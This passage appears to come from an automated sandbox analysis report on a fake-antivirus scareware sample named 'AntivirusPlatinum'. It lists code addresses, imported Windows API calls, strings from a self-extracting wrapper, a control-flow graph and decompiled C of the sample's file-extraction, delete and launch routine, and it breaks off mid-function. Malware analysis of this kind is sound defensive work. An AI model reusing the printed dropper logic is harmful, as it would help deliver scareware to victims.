                                                                                                                                                              0x0040d303
                                                                                                                                                              0x0040d308
                                                                                                                                                              0x0040d309
                                                                                                                                                              0x0040d30b
                                                                                                                                                              0x0040d315
                                                                                                                                                              0x0040d30d
                                                                                                                                                              0x0040d30d
                                                                                                                                                              0x0040d30d
                                                                                                                                                              0x0040d30b
                                                                                                                                                              0x0040d2ff
                                                                                                                                                              0x0040d31b
                                                                                                                                                              0x0040d321
                                                                                                                                                              0x0040d32d
                                                                                                                                                              0x0040d32d
                                                                                                                                                              0x0040d333
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d333
                                                                                                                                                              0x0040d248
                                                                                                                                                              0x0040d24d
                                                                                                                                                              0x0040d252
                                                                                                                                                              0x0040d254
                                                                                                                                                              0x0040d256
                                                                                                                                                              0x0040d25c
                                                                                                                                                              0x0040d25e
                                                                                                                                                              0x0040d26e
                                                                                                                                                              0x0040d279
                                                                                                                                                              0x0040d279
                                                                                                                                                              0x0040d25c
                                                                                                                                                              0x0040d280
                                                                                                                                                              0x0040d281
                                                                                                                                                              0x0040d287
                                                                                                                                                              0x0040d2b1
                                                                                                                                                              0x0040d2b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d289
                                                                                                                                                              0x0040d29b
                                                                                                                                                              0x0040d2a1
                                                                                                                                                              0x0040d2a3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d2a5
                                                                                                                                                              0x0040d2ab
                                                                                                                                                              0x0040d2ab
                                                                                                                                                              0x0040cf41
                                                                                                                                                              0x0040cf42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cf42
                                                                                                                                                              0x0040d1d9
                                                                                                                                                              0x0040d1d9
                                                                                                                                                              0x0040d1df
                                                                                                                                                              0x0040d1e4
                                                                                                                                                              0x0040d1f0
                                                                                                                                                              0x0040d203
                                                                                                                                                              0x0040d208
                                                                                                                                                              0x0040d209
                                                                                                                                                              0x0040d209
                                                                                                                                                              0x0040d211
                                                                                                                                                              0x0040d217
                                                                                                                                                              0x0040d219
                                                                                                                                                              0x0040d22f
                                                                                                                                                              0x0040d22f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d217
                                                                                                                                                              0x0040d1d7
                                                                                                                                                              0x0040cc5e
                                                                                                                                                              0x0040cc6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cc6f
                                                                                                                                                              0x0040cc64
                                                                                                                                                              0x0040cc65
                                                                                                                                                              0x0040ccdd
                                                                                                                                                              0x0040cce3
                                                                                                                                                              0x0040cce9
                                                                                                                                                              0x0040cd08
                                                                                                                                                              0x0040cd0e
                                                                                                                                                              0x0040cd25
                                                                                                                                                              0x0040cd2b
                                                                                                                                                              0x0040cd2e
                                                                                                                                                              0x0040cd34
                                                                                                                                                              0x0040cd45
                                                                                                                                                              0x0040cd55
                                                                                                                                                              0x0040cd55
                                                                                                                                                              0x0040cd5a
                                                                                                                                                              0x0040cd69
                                                                                                                                                              0x0040cd6c
                                                                                                                                                              0x0040cd77
                                                                                                                                                              0x0040cd79
                                                                                                                                                              0x0040cd8b
                                                                                                                                                              0x0040cd92
                                                                                                                                                              0x0040cd98
                                                                                                                                                              0x0040cd9a
                                                                                                                                                              0x0040cd9e
                                                                                                                                                              0x0040cda1
                                                                                                                                                              0x0040cda3
                                                                                                                                                              0x0040cda5
                                                                                                                                                              0x0040cda8
                                                                                                                                                              0x0040cdaa
                                                                                                                                                              0x0040cdaa
                                                                                                                                                              0x0040cda8
                                                                                                                                                              0x0040cdae
                                                                                                                                                              0x0040cdb3
                                                                                                                                                              0x0040cdb5
                                                                                                                                                              0x0040ce25
                                                                                                                                                              0x0040ce27
                                                                                                                                                              0x0040ce27
                                                                                                                                                              0x0040ce28
                                                                                                                                                              0x0040ce28
                                                                                                                                                              0x0040ce2b
                                                                                                                                                              0x0040cf54
                                                                                                                                                              0x0040cf5d
                                                                                                                                                              0x0040cf63
                                                                                                                                                              0x0040cf6c
                                                                                                                                                              0x0040cf74
                                                                                                                                                              0x0040cf82
                                                                                                                                                              0x0040cf90
                                                                                                                                                              0x0040cf9f
                                                                                                                                                              0x0040cfad
                                                                                                                                                              0x0040cfb2
                                                                                                                                                              0x0040cfb8
                                                                                                                                                              0x0040cfba
                                                                                                                                                              0x0040cfc0
                                                                                                                                                              0x0040cfc2
                                                                                                                                                              0x0040cfc8
                                                                                                                                                              0x0040cfd3
                                                                                                                                                              0x0040cfd3
                                                                                                                                                              0x0040cfc8
                                                                                                                                                              0x0040cfc0
                                                                                                                                                              0x0040cfdb
                                                                                                                                                              0x0040cfe0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cfe0
                                                                                                                                                              0x0040ce31
                                                                                                                                                              0x0040ce37
                                                                                                                                                              0x0040ce39
                                                                                                                                                              0x0040ce39
                                                                                                                                                              0x0040ce41
                                                                                                                                                              0x0040ce41
                                                                                                                                                              0x0040ce47
                                                                                                                                                              0x0040ce49
                                                                                                                                                              0x0040cef0
                                                                                                                                                              0x0040cf0e
                                                                                                                                                              0x0040cf1d
                                                                                                                                                              0x0040cf34
                                                                                                                                                              0x0040cf3a
                                                                                                                                                              0x0040cf3a
                                                                                                                                                              0x0040cf40
                                                                                                                                                              0x0040cf40
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cf40
                                                                                                                                                              0x0040ce5c
                                                                                                                                                              0x0040ce7f
                                                                                                                                                              0x0040ce8b
                                                                                                                                                              0x0040ce94
                                                                                                                                                              0x0040ce97
                                                                                                                                                              0x0040ce9e
                                                                                                                                                              0x0040cea5
                                                                                                                                                              0x0040ceac
                                                                                                                                                              0x0040ceaf
                                                                                                                                                              0x0040ceb6
                                                                                                                                                              0x0040cebd
                                                                                                                                                              0x0040cec0
                                                                                                                                                              0x0040cec3
                                                                                                                                                              0x0040cec9
                                                                                                                                                              0x0040cecb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ced5
                                                                                                                                                              0x0040cee0
                                                                                                                                                              0x0040cee9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cee9
                                                                                                                                                              0x0040cdb7
                                                                                                                                                              0x0040cdbd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cdbf
                                                                                                                                                              0x0040cdc2
                                                                                                                                                              0x0040ce40
                                                                                                                                                              0x0040ce40
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ce40
                                                                                                                                                              0x0040cdd7
                                                                                                                                                              0x0040cddd
                                                                                                                                                              0x0040cde6
                                                                                                                                                              0x0040cded
                                                                                                                                                              0x0040cdfd
                                                                                                                                                              0x0040ce02
                                                                                                                                                              0x0040ce05
                                                                                                                                                              0x0040ce07
                                                                                                                                                              0x0040ce09
                                                                                                                                                              0x0040ce0f
                                                                                                                                                              0x0040ce12
                                                                                                                                                              0x0040ce14
                                                                                                                                                              0x0040ce14
                                                                                                                                                              0x0040ce12
                                                                                                                                                              0x0040ce1e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ce1e
                                                                                                                                                              0x0040cd7b
                                                                                                                                                              0x0040cd7d
                                                                                                                                                              0x0040cd80
                                                                                                                                                              0x0040cd87
                                                                                                                                                              0x0040cd87
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cd87
                                                                                                                                                              0x0040cd82
                                                                                                                                                              0x0040cd85
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cd10
                                                                                                                                                              0x0040cd12
                                                                                                                                                              0x0040cd1c
                                                                                                                                                              0x0040cfe6
                                                                                                                                                              0x0040cfe6
                                                                                                                                                              0x0040cfec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cff2
                                                                                                                                                              0x0040cff8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d000
                                                                                                                                                              0x0040d00e
                                                                                                                                                              0x0040d014
                                                                                                                                                              0x0040d019
                                                                                                                                                              0x0040d01c
                                                                                                                                                              0x0040d025
                                                                                                                                                              0x0040d02f
                                                                                                                                                              0x0040d02f
                                                                                                                                                              0x0040d01e
                                                                                                                                                              0x0040d01e
                                                                                                                                                              0x0040d01e
                                                                                                                                                              0x0040d01e
                                                                                                                                                              0x0040d036
                                                                                                                                                              0x0040d044
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040d044
                                                                                                                                                              0x0040cceb
                                                                                                                                                              0x0040cceb
                                                                                                                                                              0x0040ccf1
                                                                                                                                                              0x0040ccf3
                                                                                                                                                              0x0040ccf3
                                                                                                                                                              0x0040ccfd
                                                                                                                                                              0x0040ccff
                                                                                                                                                              0x0040cd00
                                                                                                                                                              0x0040cc9f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cca1
                                                                                                                                                              0x0040cce9
                                                                                                                                                              0x0040cc67
                                                                                                                                                              0x0040cc68
                                                                                                                                                              0x0040cca7
                                                                                                                                                              0x0040ccad
                                                                                                                                                              0x0040ccc1
                                                                                                                                                              0x0040ccc1
                                                                                                                                                              0x0040cccb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cccb
                                                                                                                                                              0x0040ccaf
                                                                                                                                                              0x0040ccb9
                                                                                                                                                              0x0040ccbf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ccbf
                                                                                                                                                              0x0040cc6d
                                                                                                                                                              0x0040cc86
                                                                                                                                                              0x0040cc8b
                                                                                                                                                              0x0040cc8d
                                                                                                                                                              0x0040cc99
                                                                                                                                                              0x0040cc99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040cc8d
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040CC99
                                                                                                                                                              • GetDlgItemTextA.USER32 ref: 0040CCDD
                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040CD00
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040CD25
                                                                                                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CD45
                                                                                                                                                              • SendMessageA.USER32(?,000000C2,00000000,0041259A), ref: 0040CD55
                                                                                                                                                              • SetFocus.USER32(?), ref: 0040CD5A
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 0040CD7B
                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00000000), ref: 0040CD92
                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 0040CDA3
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040CDC4
                                                                                                                                                              • wsprintfA.USER32 ref: 0040CDD7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000001), ref: 0040CE09
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?), ref: 0040CE5C
                                                                                                                                                              • wsprintfA.USER32 ref: 0040CE7F
                                                                                                                                                              • ShellExecuteExA.SHELL32 ref: 0040CEC3
                                                                                                                                                              • WaitForInputIdle.USER32 ref: 0040CED5
                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040CEE0
                                                                                                                                                              • wsprintfA.USER32 ref: 0040CF0E
                                                                                                                                                              • MessageBoxA.USER32 ref: 0040CF34
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040CF42
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040D00E
                                                                                                                                                              • MessageBoxA.USER32 ref: 0040D044
                                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,003D02D3), ref: 0040D06D
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000069,00000172,00000000,72050A15), ref: 0040D086
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040D095
                                                                                                                                                              • GetWindowRect.USER32 ref: 0040D0A5
                                                                                                                                                              • MapWindowPoints.USER32 ref: 0040D0B3
                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 0040D0C3
                                                                                                                                                              • CreateWindowExA.USER32 ref: 0040D0F5
                                                                                                                                                              • SetMenu.USER32(?,00000067), ref: 0040D107
                                                                                                                                                              • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000203), ref: 0040D11B
                                                                                                                                                              • DestroyWindow.USER32(?), ref: 0040D124
                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040D132
                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 0040D141
                                                                                                                                                              • SendMessageA.USER32(?,00000435,00000000,00400000), ref: 0040D153
                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?), ref: 0040D165
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040D16E
                                                                                                                                                              • SetWindowTextA.USER32(?,00419F92), ref: 0040D18E
                                                                                                                                                              • DialogBoxParamA.USER32 ref: 0040D29B
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040D2D0
                                                                                                                                                              • SendMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D30D
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040D32D
                                                                                                                                                                • Part of subcall function 0040BF99: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                              • PostMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D315
                                                                                                                                                                • Part of subcall function 00406D54: OleInitialize.OLE32(00000000), ref: 00406D67
                                                                                                                                                                • Part of subcall function 00406D54: #17.COMCTL32 ref: 00406D6D
                                                                                                                                                                • Part of subcall function 00406D54: ShowWindow.USER32(?,00000000,?,?), ref: 00406D86
                                                                                                                                                                • Part of subcall function 00406D54: GetWindowRect.USER32 ref: 00406D9F
                                                                                                                                                                • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DB4
                                                                                                                                                                • Part of subcall function 00406D54: MapWindowPoints.USER32 ref: 00406DB9
                                                                                                                                                                • Part of subcall function 00406D54: DestroyWindow.USER32(?), ref: 00406DC7
                                                                                                                                                                • Part of subcall function 00406D54: GetParent.USER32(?), ref: 00406DD5
                                                                                                                                                                • Part of subcall function 00406D54: CreateWindowExA.USER32 ref: 00406DFD
                                                                                                                                                                • Part of subcall function 00406D54: ShowWindow.USER32(00000000,00000005), ref: 00406E0D
                                                                                                                                                                • Part of subcall function 00406D54: UpdateWindow.USER32(?), ref: 00406E12
                                                                                                                                                                • Part of subcall function 0040A205: GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                                • Part of subcall function 0040A205: RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Message$ItemSend$Text$ErrorLastwsprintf$CallbackCreateCurrentDestroyDialogDirectoryDispatcherHeapMenuParentPointsRectShowUser$CountExecuteFileFocusFreeIdleInitializeInputModuleNameParamPostProcessShellSleepTickUpdateWaitlstrcmpi
                                                                                                                                                              • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$@#A$@Met$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$LICENSEDLG$P'A$RichEdit$STARTDLG$__tmp_rar_sfx_access_check_%u$|LA
                                                                                                                                                              • API String ID: 3736303233-4109971932
                                                                                                                                                              • Opcode ID: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                              • Instruction ID: f2e0a792357f86b342ab9803b758d3748dbde46f84287d89c15ad3aa3ed67d42
                                                                                                                                                              • Opcode Fuzzy Hash: f6039e195e714c08ed0771bd8e5382e57575257739d1cdfff141d797070971d9
                                                                                                                                                              • Instruction Fuzzy Hash: B3128FB1941209BEDB11AFA0DD85EEE3A6CEB05304F00817AF605F61E1C7B84D56DB6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 173 40bf99-40bfaa call 401200 176 40bfb0-40bfd9 call 40b613 173->176 177 40ca5b-40ca5c 173->177 180 40ca5a 176->180 181 40bfdf-40bfe0 176->181 180->177 182 40bfe1-40c001 181->182 183 40c008-40c01b call 40a925 182->183 186 40c01d 183->186 187 40c021-40c03a lstrcmpiA 186->187 188 40c04a-40c04e 187->188 189 40c03c-40c043 187->189 191 40c054-40c057 188->191 192 40ca2a-40ca52 call 40b613 188->192 189->187 190 40c045 189->190 190->192 193 40c313-40c317 191->193 194 40c2f4-40c2f8 191->194 195 40c266-40c26a 191->195 196 40c05e-40c062 191->196 192->182 203 40ca58-40ca59 192->203 193->192 202 40c31d-40c324 193->202 194->192 201 40c2fe-40c30e SetWindowTextA 194->201 195->192 199 40c270-40c27c 195->199 196->192 200 40c068-40c0ea GetCurrentDirectoryA call 40a477 call 4076c8 call 40a5e2 call 405bad call 405bdd call 403556 call 405fad 196->200 204 40c289-40c28d 199->204 205 40c27e-40c284 call 40a5e2 199->205 278 40c0f0 200->278 279 40c256-40c261 call 405bca 200->279 201->192 202->192 207 40c32a-40c33e 202->207 203->180 211 40c297-40c29f call 40b7ba 204->211 212 40c28f-40c295 204->212 205->204 208 40c340 207->208 209 40c346-40c351 call 40a384 207->209 208->209 209->192 224 40c357-40c35b 209->224 215 40c2a1-40c2a3 211->215 212->215 220 40c2a5-40c2a7 215->220 221 40c2a9-40c2b4 call 40a384 215->221 225 40c2b6-40c2d3 call 40a384 call 40a224 220->225 221->225 229 40c361-40c365 224->229 230 40c408-40c40a 224->230 247 40c2d5 225->247 248 40c2d8-40c2e3 call 40a5e2 225->248 229->230 234 40c36b 229->234 235 40c410-40c412 230->235 236 40c36e-40c376 call 40a477 230->236 234->236 239 40c414-40c418 235->239 240 40c41e-40c438 RegOpenKeyExA 235->240 244 40c37b-40c38b call 40a3d9 236->244 239->236 239->240 245 40c469-40c470 240->245 246 40c43a-40c463 RegQueryValueExA RegCloseKey 240->246 261 40c396-40c3e1 call 40a477 call 40b9b0 GetDlgItem SetWindowTextA SendMessageA call 40a4e9 244->261 262 40c38d-40c391 244->262 251 40c472-40c489 call 40a384 245->251 252 40c49c-40c4b8 call 40a384 * 2 245->252 246->245 247->248 248->192 265 40c2e9-40c2ef call 40a205 248->265 251->252 269 40c48b-40c497 call 40a5e2 251->269 252->244 276 40c4be-40c4cb call 40a5e2 252->276 291 40c3e6-40c3e8 261->291 262->261 267 40c393 262->267 265->192 267->261 269->252 276->192 276->244 282 40c0f5-40c10b SetFileAttributesA 278->282 279->192 287 40c111-40c119 call 406ea5 282->287 288 40c1bb-40c1c7 GetFileAttributesA 282->288 287->288 299 40c11f-40c150 call 407300 call 4076c8 call 40a384 287->299 289 40c1c9-40c1d8 DeleteFileA 288->289 290 40c23a-40c250 call 405fad 288->290 289->290 293 40c1da-40c1de 289->293 290->279 290->282 291->192 294 40c3ee-40c403 SendMessageA 291->294 297 40c1e6-40c206 wsprintfA GetFileAttributesA 293->297 294->192 301 40c1e0-40c1e3 297->301 302 40c208-40c21e MoveFileA 297->302 312 40c152-40c161 call 40a384 299->312 313 40c163-40c173 call 407279 299->313 301->297 302->290 304 40c220-40c227 call 406ea5 302->304 304->290 310 40c229-40c234 MoveFileExA 304->310 310->290 312->313 318 40c179-40c1b5 call 40a384 call 40a289 SHFileOperationA 312->318 313->279 313->318 318->288
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E0040BF99(void* __edx, void* __esi, signed int _a1, struct HWND__* _a4, char _a8, char _a11, signed int _a12) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				char _v9;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				int _v24;
                                                                                                                                                              				struct _SHFILEOPSTRUCTA _v56;
                                                                                                                                                              				char _v568;
                                                                                                                                                              				char _v1080;
                                                                                                                                                              				char _v2103;
                                                                                                                                                              				char _v2104;
                                                                                                                                                              				char _v3127;
                                                                                                                                                              				char _v3128;
                                                                                                                                                              				char _v5176;
                                                                                                                                                              				char _v7223;
                                                                                                                                                              				char _v7224;
                                                                                                                                                              				void* _v8248;
                                                                                                                                                              				char _v9416;
                                                                                                                                                              				char _v12504;
                                                                                                                                                              				void _v13528;
                                                                                                                                                              				char _v16608;
                                                                                                                                                              				char _v17632;
                                                                                                                                                              				char _v21728;
                                                                                                                                                              				char _v25824;
                                                                                                                                                              				char _v29920;
                                                                                                                                                              				void* _v34016;
                                                                                                                                                              				char _v38112;
                                                                                                                                                              				char _v42207;
                                                                                                                                                              				char _v42208;
                                                                                                                                                              				char _v46304;
                                                                                                                                                              				signed int __edi;
                                                                                                                                                              				void* _t235;
                                                                                                                                                              				char _t240;
                                                                                                                                                              				void* _t316;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              
                                                                                                                                                              				_t316 = __edx;
                                                                                                                                                              				_t235 = E00401200(0xb4dc);
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					return _t235;
                                                                                                                                                              				}
                                                                                                                                                              				_t240 = E0040B613(0x1000, __esi, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11); // executed
                                                                                                                                                              				_a8 = _t240;
                                                                                                                                                              				if(_t240 == 0) {
                                                                                                                                                              					L157:
                                                                                                                                                              					return _t240;
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(__esi);
                                                                                                                                                              					do {
                                                                                                                                                              						_t323 = GetFileAttributesA;
                                                                                                                                                              						_v8 =  &_v46304;
                                                                                                                                                              						_v16 = 6;
                                                                                                                                                              						goto L4;
                                                                                                                                                              						L6:
                                                                                                                                                              						while(lstrcmpiA( &_v21728,  *(0x4140b8 + _v8 * 4)) != 0) {
                                                                                                                                                              							_v8 = _v8 + 1;
                                                                                                                                                              							if(_v8 < 0xd) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L155;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						if(_v8 > 0xc) {
                                                                                                                                                              							goto L155;
                                                                                                                                                              						}
                                                                                                                                                              						switch( *((intOrPtr*)(_v8 * 4 +  &M0040CA61))) {
                                                                                                                                                              							case 0:
                                                                                                                                                              								__eflags = _a12 - 2;
                                                                                                                                                              								if(_a12 != 2) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								GetCurrentDirectoryA(0x400,  &_v1080);
                                                                                                                                                              								E0040A477( &_v3128,  &_v1080);
                                                                                                                                                              								E004076C8( &_v3128);
                                                                                                                                                              								E0040A5E2( &_v3128,  &_v7224);
                                                                                                                                                              								E00405BAD( &_v16608);
                                                                                                                                                              								E00405BDD( &_v16608,  &_v3128);
                                                                                                                                                              								E00403556( &_v12504);
                                                                                                                                                              								_push(0);
                                                                                                                                                              								_t314 =  &_v16608;
                                                                                                                                                              								_t265 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                              								__eflags = _t265;
                                                                                                                                                              								if(_t265 == 0) {
                                                                                                                                                              									L29:
                                                                                                                                                              									E00405BCA( &_v16608);
                                                                                                                                                              									goto L155;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t309 = "%s.%d.tmp";
                                                                                                                                                              									do {
                                                                                                                                                              										SetFileAttributesA( &_v12504, 0);
                                                                                                                                                              										__eflags = _v9416;
                                                                                                                                                              										if(_v9416 == 0) {
                                                                                                                                                              											L20:
                                                                                                                                                              											_t270 = GetFileAttributesA( &_v12504);
                                                                                                                                                              											__eflags = _t270 - 0xffffffff;
                                                                                                                                                              											if(_t270 == 0xffffffff) {
                                                                                                                                                              												goto L28;
                                                                                                                                                              											}
                                                                                                                                                              											_t274 = DeleteFileA( &_v12504);
                                                                                                                                                              											__eflags = _t274;
                                                                                                                                                              											if(_t274 != 0) {
                                                                                                                                                              												goto L28;
                                                                                                                                                              											} else {
                                                                                                                                                              												_v8 = _v8 & _t274;
                                                                                                                                                              												_push(_t274);
                                                                                                                                                              												goto L24;
                                                                                                                                                              												L24:
                                                                                                                                                              												wsprintfA( &_v2104, _t309,  &_v12504);
                                                                                                                                                              												_t326 = _t326 + 0x10;
                                                                                                                                                              												_t279 = GetFileAttributesA( &_v2104);
                                                                                                                                                              												__eflags = _t279 - 0xffffffff;
                                                                                                                                                              												if(_t279 != 0xffffffff) {
                                                                                                                                                              													_t66 =  &_v8;
                                                                                                                                                              													 *_t66 = _v8 + 1;
                                                                                                                                                              													__eflags =  *_t66;
                                                                                                                                                              													_push(_v8);
                                                                                                                                                              													goto L24;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t282 = MoveFileA( &_v12504,  &_v2104);
                                                                                                                                                              													__eflags = _t282;
                                                                                                                                                              													if(_t282 != 0) {
                                                                                                                                                              														_t283 = E00406EA5();
                                                                                                                                                              														__eflags = _t283;
                                                                                                                                                              														if(_t283 != 0) {
                                                                                                                                                              															MoveFileExA( &_v2104, 0, 4);
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              													goto L28;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = E00406EA5() - 4;
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											goto L20;
                                                                                                                                                              										}
                                                                                                                                                              										E00407300(_t314, __eflags,  &_v1080,  &_v8248);
                                                                                                                                                              										E004076C8( &_v8248);
                                                                                                                                                              										_t293 = E0040A384(_t314,  &_v1080);
                                                                                                                                                              										_v16 = _t293;
                                                                                                                                                              										__eflags = _t293 - 4;
                                                                                                                                                              										if(_t293 < 4) {
                                                                                                                                                              											L18:
                                                                                                                                                              											_t295 = E00407279(_t314,  &_v7224, 0);
                                                                                                                                                              											__eflags = _t295;
                                                                                                                                                              											if(_t295 != 0) {
                                                                                                                                                              												goto L29;
                                                                                                                                                              											}
                                                                                                                                                              											L19:
                                                                                                                                                              											 *((char*)(_t325 + E0040A384(_t314,  &_v12504) - 0x30d3)) = 0;
                                                                                                                                                              											E0040A289(_t314,  &_v56, 0, 0x1e);
                                                                                                                                                              											_push(0x14);
                                                                                                                                                              											_pop(_t300);
                                                                                                                                                              											_v56.fFlags = _t300;
                                                                                                                                                              											_v56.pFrom =  &_v12504;
                                                                                                                                                              											_v56.wFunc = 3;
                                                                                                                                                              											SHFileOperationA( &_v56);
                                                                                                                                                              											goto L20;
                                                                                                                                                              										}
                                                                                                                                                              										_t305 = E0040A384(_t314,  &_v8248);
                                                                                                                                                              										__eflags = _v16 - _t305;
                                                                                                                                                              										if(_v16 > _t305) {
                                                                                                                                                              											goto L19;
                                                                                                                                                              										}
                                                                                                                                                              										goto L18;
                                                                                                                                                              										L28:
                                                                                                                                                              										_push(0);
                                                                                                                                                              										_t314 =  &_v16608;
                                                                                                                                                              										_t272 = E00405FAD( &_v16608, _t316,  &_v12504);
                                                                                                                                                              										__eflags = _t272;
                                                                                                                                                              									} while (_t272 != 0);
                                                                                                                                                              									goto L29;
                                                                                                                                                              								}
                                                                                                                                                              							case 1:
                                                                                                                                                              								__eflags = _a12;
                                                                                                                                                              								if(_a12 == 0) {
                                                                                                                                                              									__eax =  *0x41a81c;
                                                                                                                                                              									__eflags =  *0x41a81c;
                                                                                                                                                              									__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                              									__eflags = __bl;
                                                                                                                                                              									if(__bl == 0) {
                                                                                                                                                              										__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _v9;
                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                              										__esi =  &_a8;
                                                                                                                                                              										__edi = E0040B7BA( &_a8, __eflags);
                                                                                                                                                              									} else {
                                                                                                                                                              										__edi =  &_v7224;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = __bl;
                                                                                                                                                              									if(__bl == 0) {
                                                                                                                                                              										__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                              									} else {
                                                                                                                                                              										__esi = 0;
                                                                                                                                                              									}
                                                                                                                                                              									E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                              									__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                              									 *0x41a81c = __eax;
                                                                                                                                                              									__eflags = __bl;
                                                                                                                                                              									if(__bl != 0) {
                                                                                                                                                              										 *__eax = 0;
